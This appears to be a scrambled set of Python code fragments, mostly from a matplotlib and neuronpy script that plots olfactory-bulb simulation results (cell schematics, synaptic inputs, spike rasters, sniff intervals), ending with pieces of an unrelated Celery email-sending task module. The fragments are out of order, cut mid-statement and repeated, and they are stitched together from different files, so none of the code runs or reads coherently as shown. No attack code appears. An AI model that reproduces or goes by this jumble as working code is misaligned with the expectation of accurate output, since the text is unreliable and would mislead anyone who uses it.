# Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10,", "textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center')", "color='black'): xloc = 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec =", "in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5,", "= numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0", "numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc],", "numpy from matplotlib import pyplot from neuronpy.graphics import spikeplot from bulbspikes import *", "blueplt], \\ ['sniff event', 'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15,", "syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input", ".5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\", "return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1,", "1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx = 0 for", "ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i", "> xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\", "cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) 
sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft,", "in mask_b: if i == 1: if comp[idx] >= xlim[0] and comp[idx] <", "\"\"\" import os import numpy from matplotlib import pyplot from neuronpy.graphics import spikeplot", "xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import", "in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M", "idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim =", "breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft')", "\\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx =", "backgroundcolor='white') break # Mark amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190,", "ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks", "schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair,", "i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4],", "markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', 
markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def", "spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref],", "schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure,", "xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center')", "color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath, breath],", "sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False)", "< xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue')", "'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark", "ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) # Glom", "gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) 
sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False", "1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\", "marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color,", "= ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid,", "window=5) # idx = 0 # for i in mask_a: # if i", "linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay", "cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim)", "markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc],", "cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags =", "for i in range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20 y =", "\\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break #", "breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time", "breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data',", "int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = 
syn_ax.plot(x,y0, color='red') blueplt =", "syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline')", "ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in", "onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\",", "gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.)", "color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite", "pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07,", "sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences,", "= 10+cellid*20 y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5)", "> 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\", "red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\", "Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) #", "fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) 
draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue')", "range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005,", "format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none')", "= (10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair) #", "Mark amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data',", "[0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot", "pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02,", "M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = []", "6 18:22:04 2011 @author: - \"\"\" import os import numpy from matplotlib import", "# Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o',", "syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for", "breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt = 1", "idx = 0 for b in breath_events: if b >= tstop: break else:", "250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval span", "# for i in mask_a: # if i == 1: # 
raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o',", "yvec).mask, \\ color=color, linewidth=0.) # Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color)", "= 0 for i in mask_b: if i == 1: if comp[idx] >=", "linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws =", "10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig,", "+= EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt =", "comp, window=5) # idx = 0 # for i in mask_a: # if", "event', 'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1,", "= bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1]", "= spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) 
sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red')", "color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in", "color='black') # Analyze an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events", "# raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx = 0 for i", "verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath],", "y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt", "data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in", "\\ color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5,", "for i in range(5): data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def", "range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i - cellloc)", "ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([])", "xytext=(breath_events[i]+17, .5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15", "pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, 
pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') #", "y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1,", "mask_b: if i == 1: if comp[idx] >= xlim[0] and comp[idx] < xlim[1]:", "from neuronpy.util import spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path =", "bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx", "ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax,", "color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color,", "= fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax,", "color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule'])", "ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) #", "= numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in range(5): data.append([]) for m", "# Mark delay interval for i in range(len(breath_events)): if breath_events[i] > 1400: span", "# pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig =", "1., .102), loc=1, ncol=3, mode=\"expand\", \\ 
borderaxespad=0., handletextpad=.2) # Mark sniff interval for", "if comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple', fontweight='bold',", "1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for i", "'B)', transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path,", "'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0.,", "format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11))", "markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance", "numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents() dt = 1 tstop =", "\\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft',", "in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data =", "numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale,", "[9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary", 
"return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i", "in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M =", "matplotlib import pyplot from neuronpy.graphics import spikeplot from bulbspikes import * from neuronpy.util", "tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto red', 'input", "xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\",", "= syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--',", "linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white')", "ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data =", "marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10))", ".53, \\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break", "dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule", "= 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = 
numpy.log(numpy.add(y,1)) ax.plot(range(101),", "horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025,", "y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o',", "for b in breath_events: if b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt)", "Mark delay interval for i in range(len(breath_events)): if breath_events[i] > 1400: span =", "pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos", "numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events: if b >=", "= numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color)", "def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) 
ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5),", "fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple',", "= numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101),", "\\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for i in range(len(breath_events)): if breath_events[i]", "'stimdelayevents.txt')) data = [] for i in range(5): data.append([]) for m in M:", ".28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\", "idx += 1 idx = 0 for i in mask_b: if i ==", "1: if comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\ color='purple',", "def read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in range(5):", "= 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp =", "- cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color)", "import pyplot from neuronpy.graphics import spikeplot from bulbspikes import * from neuronpy.util import", "sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) 
sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False )", "cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27])", "markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8], color=color, linewidth=2) format_schematic_axis(ax) def draw_weights(cellids, ax,", "i in range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i", "linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center', verticalalignment='top',", "for m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): #", "analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim()", "break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] +=", "file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts =", "cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue')", "EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0,", "numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1.,", "draw=False) sp.set_markercolor('red') 
sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio = \\", "xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53," ]
[ "task from d3status.mail import send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]):", "def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to, subject, body, html, attachments)", "import task from d3status.mail import send_email @task def send_email_task(fr, to, subject, body, html=None,", "<NAME> <<EMAIL>> # Created on Jun 30, 2012 # from celery.task import task", "# Copyright (c) 2012 feilong.me. All rights reserved. # # @author: <NAME> <<EMAIL>>", "# # @author: <NAME> <<EMAIL>> # Created on Jun 30, 2012 # from", "# from celery.task import task from d3status.mail import send_email @task def send_email_task(fr, to,", "on Jun 30, 2012 # from celery.task import task from d3status.mail import send_email", "celery.task import task from d3status.mail import send_email @task def send_email_task(fr, to, subject, body,", "# # Copyright (c) 2012 feilong.me. All rights reserved. # # @author: <NAME>", "@task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to, subject, body, html,", "2012 # from celery.task import task from d3status.mail import send_email @task def send_email_task(fr,", "# @author: <NAME> <<EMAIL>> # Created on Jun 30, 2012 # from celery.task", "Copyright (c) 2012 feilong.me. All rights reserved. # # @author: <NAME> <<EMAIL>> #", "2012 feilong.me. All rights reserved. # # @author: <NAME> <<EMAIL>> # Created on", "from d3status.mail import send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr,", "<<EMAIL>> # Created on Jun 30, 2012 # from celery.task import task from", "Created on Jun 30, 2012 # from celery.task import task from d3status.mail import", "rights reserved. 
